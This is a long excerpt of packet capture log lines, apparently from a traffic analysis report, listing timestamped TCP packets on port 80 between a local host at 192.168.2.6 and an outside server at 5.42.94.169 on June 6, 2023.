                                                        Jun 6, 2023 17:14:52.225927114 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.225949049 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.225954056 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.225970984 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.225994110 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226016045 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226037025 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226062059 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226068974 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226080894 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226095915 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226104975 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226128101 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226144075 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226149082 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226172924 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226186991 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226198912 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226219893 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226233959 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226244926 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226270914 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226279974 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226291895 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226317883 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226326942 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226342916 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226366043 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226376057 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226387024 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226409912 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226423025 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226433039 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226455927 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226474047 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226499081 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226505995 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226519108 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226540089 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226562977 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226577997 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226588964 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226613998 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226624012 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226639032 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226659060 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226675034 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226681948 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226706982 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226732016 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226746082 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226757050 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226782084 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226798058 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226808071 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226830006 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226851940 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226861000 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226876020 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226900101 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226926088 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226934910 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226948977 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226970911 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.226988077 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.226994038 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227014065 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227025986 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227035999 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227045059 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227060080 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227066994 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227083921 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227108955 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227123976 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227133989 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227157116 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227174044 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227180958 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227200985 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227216005 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227219105 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227238894 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227250099 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227263927 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227287054 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227299929 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227313042 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227338076 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227346897 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227358103 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227380991 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227394104 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227399111 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227416992 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227433920 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227442980 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227452993 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227471113 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227474928 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227489948 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227508068 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227508068 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227525949 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227544069 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227557898 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227561951 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227581024 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227583885 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227598906 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227613926 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227617979 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227637053 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227647066 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227654934 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227673054 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227690935 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227694035 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227709055 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227725983 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227727890 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227744102 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227761030 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227761984 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227780104 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227793932 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227797031 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227814913 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227829933 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227833986 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227852106 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227869987 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227869987 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227888107 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227901936 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.227906942 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227925062 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.227937937 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.276873112 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.276873112 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.276912928 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.276937008 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.276962042 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.276984930 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277003050 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277009964 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277029991 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277049065 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277072906 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277081013 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277096033 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277115107 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277120113 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277138948 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277143002 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277168036 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277190924 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277208090 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277209997 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277230024 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277235031 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277257919 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277282953 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277287960 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277307034 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277323008 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277329922 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277354002 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277374029 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277376890 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277400970 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277432919 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277439117 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277460098 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277477980 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277477980 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277496099 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277515888 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277524948 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277534008 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277553082 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277555943 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277571917 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277590990 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277590990 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277610064 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277627945 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277633905 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277647972 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277666092 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277666092 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277684927 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277704000 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277704000 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277721882 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277740955 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277745962 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277760029 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277789116 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277790070 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277808905 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277829885 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277847052 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277848005 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277867079 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277869940 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277884960 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277904034 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277904987 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277921915 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277949095 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277951956 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.277966976 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277986050 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.277986050 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278003931 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278023005 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278023005 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278043032 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278060913 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278069973 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278080940 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278104067 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278103113 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278126955 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278145075 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278151035 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278173923 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278191090 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278198004 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278215885 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278234959 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278239965 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278254032 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278271914 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278275013 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278290987 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278310061 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278314114 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278328896 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278347969 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278352976 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278367043 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278384924 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278387070 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278404951 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278424025 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278424978 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278443098 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278461933 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278460979 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278480053 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278496027 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278497934 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278517962 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278532982 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278542042 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278563976 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278584003 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278584957 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278609991 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278628111 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278634071 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278659105 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278672934 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278677940 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278696060 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278713942 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278713942 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278733015 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278752089 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278753042 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278773069 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278789997 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278803110 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278829098 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278845072 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278852940 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278877974 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278887987 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278898954 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278918028 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278935909 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278935909 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278954983 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278971910 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.278974056 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.278991938 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.279011965 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.279021978 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.279062986 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.327802896 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.327851057 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.327871084 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.327889919 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.327909946 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.327928066 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.327946901 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.327964067 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.327982903 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328001022 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328020096 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328038931 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328041077 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328058958 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328087091 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328104973 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328111887 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328124046 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328142881 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328150988 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328175068 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328378916 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328402996 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328422070 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328439951 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328439951 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328485966 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328638077 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328676939 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328696012 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328715086 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328716993 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328733921 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328753948 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328764915 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328773022 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328797102 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328809023 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328819990 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328824997 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328845024 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328860998 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328866005 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328886032 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328905106 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328916073 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328923941 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328943014 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328953028 CEST4970880192.168.2.65.42.94.169
